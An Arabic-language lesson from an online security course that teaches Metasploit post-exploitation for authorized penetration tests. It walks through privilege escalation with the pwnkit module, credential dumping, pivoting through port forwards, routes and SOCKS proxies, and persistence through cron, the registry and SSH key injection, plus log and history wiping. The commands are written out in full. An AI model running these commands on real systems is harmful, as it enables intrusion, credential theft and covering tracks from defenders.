Cyber Security Academy · درس

ما بعد الاستغلال: التمحور والاستمرارية

استخدم وحدات ما بعد الاستغلال في Metasploit لتصعيد الامتيازات، وتفريغ بيانات الاعتماد، وتحقيق الاستمرارية.

الدرس 4 من 413 خطوة

ما بعد الاستغلال: التمحور والاستمرارية درس مجاني في Cyber Security Academy على CoddyKit. هذا هو الدرس 4 من أصل 4. يمكنك قراءة الدرس كاملاً أدناه مجاناً — ثم تمرن عليه مباشرة في المتصفح باستخدام محرر أكواد مدمج ومدرس ذكاء اصطناعي متاح 24/7. هذا الدرس جزء من مسار التعلم في Cyber Security Academy، وتقدمك يتزامن عبر الويب وتطبيق CoddyKit. تتضمن دورة Cyber Security Academy 4 دروس في المجموع.

أهداف ما بعد الاستغلال

بعد الوصول الأولي، تتمثل أهداف المهاجم في: رفع الامتيازات، وجمع المعلومات، والحفاظ على الوصول المستمر، والتحرك جانبيًا للوصول إلى الهدف الحقيقي (البيانات أو الأنظمة أو التحكم بالنطاق).

الوعي بالموقف

تتمثل الخطوات الأولى بعد الحصول على shell في فهم موقعك. اجمع معلومات النظام، وإعدادات الشبكة، وامتيازات المستخدم الحالي، والعمليات قيد التشغيل، ومتغيرات البيئة.

meterpreter > sysinfo
meterpreter > getuid
meterpreter > getpid
meterpreter > run post/multi/recon/local_exploit_suggester
meterpreter > run post/linux/gather/enum_system

رفع الامتيازات

ينقل رفع الامتيازات محليًا المستخدم من shell منخفض الامتيازات إلى root/SYSTEM. يحدد local_exploit_suggester في Metasploit عمليات استغلال النواة أو الاستغلالات المحلية المناسبة بناءً على إصدار نظام التشغيل المستهدف.

meterpreter > run post/multi/recon/local_exploit_suggester

# Identifies applicable exploits
# Then:
msf6 > use exploit/linux/local/cve_2021_4034_pwnkit
msf6 > set SESSION 1
msf6 > run

جمع بيانات الاعتماد

اجمع بيانات الاعتماد، بما في ذلك كلمات المرور المجزأة، وبيانات الاعتماد بنص واضح في ملفات الإعداد، وكلمات المرور المحفوظة في المتصفحات، ومفاتيح SSH. تتيح هذه العناصر الحركة الجانبية والاستمرارية.

meterpreter > run post/linux/gather/hashdump
meterpreter > run post/windows/gather/credentials/credential_collector
meterpreter > run post/multi/gather/ssh_creds

# Check env vars for cleartext creds:
meterpreter > run post/multi/gather/env

الارتكاز: إعادة توجيه المنافذ

يستخدم الارتكاز مضيفًا مخترقًا كجسر للوصول إلى الشبكات الداخلية المعزولة. ينشئ portfwd في Metasploit عمليات إعادة توجيه للمنافذ المحلية عبر جلسة Meterpreter.

# Forward local port 3306 to internal DB
meterpreter > portfwd add -l 3306 -p 3306 -r 10.10.10.20

# Now connect locally:
mysql -h 127.0.0.1 -P 3306 -u root

التوجيه عبر الجلسات

تضيف وحدة route في Metasploit مسارات شبكية عبر جلسة، مما يسمح للوحدات الأخرى بالوصول إلى الشبكات التي لا يمكن الوصول إليها إلا عبر المضيف المستخدم كنقطة ارتكاز.

msf6 > route add 10.10.10.0/24 1   # route via session 1
msf6 > route print

# Now run modules targeting 10.10.10.x
# through session 1 as pivot

الارتكاز عبر وكيل SOCKS

يتيح وكيل Socks عبر Metasploit (أو chisel/ssh -D) توجيه الأدوات المختلفة عبر نقطة الارتكاز باستخدام proxychains، مما يمكّن nmap وcurl والمتصفحات من الوصول إلى الشبكات الداخلية.

# Set up SOCKS proxy through session
msf6 > use auxiliary/server/socks_proxy
msf6 > set SRVPORT 1080
msf6 > set VERSION 5
msf6 > run -j

# Route tools through proxy
proxychains nmap -sT 10.10.10.0/24

آليات الاستمرارية

تضمن الاستمرارية بقاء الوصول بعد إعادة التشغيل وفقدان الجلسة. وتشمل الأساليب الشائعة: مهام cron (في Linux)، ومفاتيح تشغيل السجل (في Windows)، وحقن مفاتيح SSH authorized_keys، وتثبيت الخدمات.

# Linux: cron-based persistence
meterpreter > run post/linux/manage/cron_persistence

# Windows: registry
meterpreter > run post/windows/manage/persistence_exe

# SSH key injection
echo "ssh-rsa AAAA..." >> /root/.ssh/authorized_keys

محو الآثار

يمحو المهاجمون السجلات للحفاظ على التخفي. ملاحظة أمنية: ترسل حلول SIEM وEDR الحديثة السجلات إلى خارج المضيف في الوقت الفعلي، لذا لا يؤدي محو السجلات المحلية إلى إزالة السجلات المركزية.

meterpreter > clearev          # clear Windows event logs

# Linux: clear bash history
unset HISTFILE
cat /dev/null > ~/.bash_history

وحدات ما بعد الاستغلال

يتضمن Metasploit مئات الوحدات اللاحقة لأنظمة Windows وLinux، وتشمل جمع بيانات الاعتماد، وبيانات المتصفح، وتسجيل ضغطات المفاتيح، والتقاط لقطات الشاشة، وحصر الشبكة.

msf6 > use post/windows/gather/enum_logged_on_users
msf6 > use post/multi/gather/browser_history
msf6 > use post/windows/gather/screen_spy
msf6 > set SESSION 1
msf6 > run

معرفة متى تتوقف

في اختبارات الاختراق المصرح بها، توقف عند الوصول إلى هدف النطاق المتفق عليه أو عند مواجهة بيانات غير مصرح لك بالوصول إليها. وثّق مسارك بعناية — فهذا هو مسار الهجوم الذي ستورده في التقرير.

تحقق سريع

ماذا يتيح الأمر "route add" في Metasploit؟

ملخص: ما بعد الاستغلال

يبني ما بعد الاستغلال على الوصول الأولي لتحقيق أثر فعلي: رفع الامتيازات، وجمع بيانات الاعتماد، والحركة الجانبية، والاستمرارية. يوفر Metasploit وحدات لاحقة لكل مرحلة. وثّق كل خطوة — فسلسلة الهجوم من نقطة الدخول إلى الهدف هي التسليم الأساسي لاختبار الاختراق.

البدء مجانًا

تعلم Cyber Security Academy مع معلم ذكاء اصطناعي — مجانًا

اكتب وقم بتشغيل أكوادك الفعلية في المتصفح، واحصل على مساعدة فورية من معلم ذكاء اصطناعي متاح 24/7، واستمر من حيث توقفت على الويب أو في التطبيق.

الدورات
76
الدروس
303

الأسئلة الشائعة

هل درس «ما بعد الاستغلال: التمحور والاستمرارية» مجاني؟

نعم — نص درس «ما بعد الاستغلال: التمحور والاستمرارية» كامل متاح مجاناً هنا على الويب. لتمرينه بشكل تفاعلي (محرر أكواد مدمج ومدرس ذكاء اصطناعي متاح 24/7) وفتح باقي دورة Cyber Security Academy، انتقل إلى CoddyKit PRO. تتضمن دورة Cyber Security Academy 4 دروس في المجموع.

ماذا ستتعلم في «ما بعد الاستغلال: التمحور والاستمرارية»؟

استخدم وحدات ما بعد الاستغلال في Metasploit لتصعيد الامتيازات، وتفريغ بيانات الاعتماد، وتحقيق الاستمرارية. تتمرن على Cyber Security Academy مع أكواد عملية تشغلها مباشرة في المتصفح، ومدرس ذكاء اصطناعي متاح 24/7 يجيب على أسئلتك أثناء عملك.

هل أحتاج إلى خبرة سابقة لأبدأ Cyber Security Academy؟

لا تُشترط خبرة سابقة. Cyber Security Academy على CoddyKit منظم للمبتدئين حتى المتقدمين، لذا يمكنك البدء من هنا أو من البداية والتقدم بسرعتك الخاصة. هذا هو الدرس 4 من أصل 4.

كم من الوقت يستغرق درس «ما بعد الاستغلال: التمحور والاستمرارية»؟

معظم دروس CoddyKit تستغرق حوالي 5–10 دقائق. كل منها موجز وتفاعلي، لذا تحرز تقدماً مستمراً وتستأنف من حيث توقفت عبر الويب والتطبيق.

هل يمكنني كتابة وتشغيل أكواد في درس Cyber Security Academy هذا؟

نعم. كل درس في Cyber Security Academy يتضمن محرر أكواد مدمج، لذا تكتب وتشغل أكواداً حقيقية مباشرة في متصفحك وتحصل على تعليقات فورية من الذكاء الاصطناعي — بدون إعداد محلي.

جميع الدروس في هذه الدورة

  1. بنية Metasploit وmsfconsole
  2. استغلال ثغرة معروفة
  3. الحمولات: المرحلية وغير المرحلية وMeterpreter
  4. ما بعد الاستغلال: التمحور والاستمرارية
← العودة إلى Cyber Security Academy